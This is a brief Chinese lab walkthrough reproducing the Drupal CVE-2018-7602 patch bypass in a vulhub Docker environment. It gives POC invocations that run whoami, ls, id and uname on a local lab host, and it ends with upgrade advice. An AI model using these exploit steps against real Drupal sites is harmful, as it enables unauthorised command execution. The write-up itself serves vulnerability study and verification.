漏洞原因:源于7600漏洞修复不完全,导致补丁被绕过,,对destination=URL中的URL进行URL编码,会对“#”进行编码2次,绕过sanitiza()函数过滤。
漏洞版本:Drupal 7.x 8.x
一 。首先利用vulhub下载打开drupal下的CVE-2018-7602
命令:docker-compose build(出现镜像问题,直接执行下面代码)
docker-compose up -d
二。进行安装Drupal
我这里的账号 和 密码都是drupal
安装好了
三。利用vulhub中自带的POC,进行漏洞验证及利用
输入以下命令:
python3 drupa7-CVE-2018-7602.py -c “whoami” drupal drupal http://192.168.5.100:8081/
其中 -c + “命令 这里我填写的whoami” drupal drupal 分别是账号和密码
试试下面:
python3 drupa7-CVE-2018-7602.py -c “ls” drupal drupal http://192.168.5.100:8081/
python3 drupa7-CVE-2018-7602.py -c “id” drupal drupal http://192.168.5.100:8081/
python3 drupa7-CVE-2018-7602.py -c "uname -a " drupal drupal http://192.168.5.100:8081/ 内核信息
四。修复建议
Drupal升级至最新版本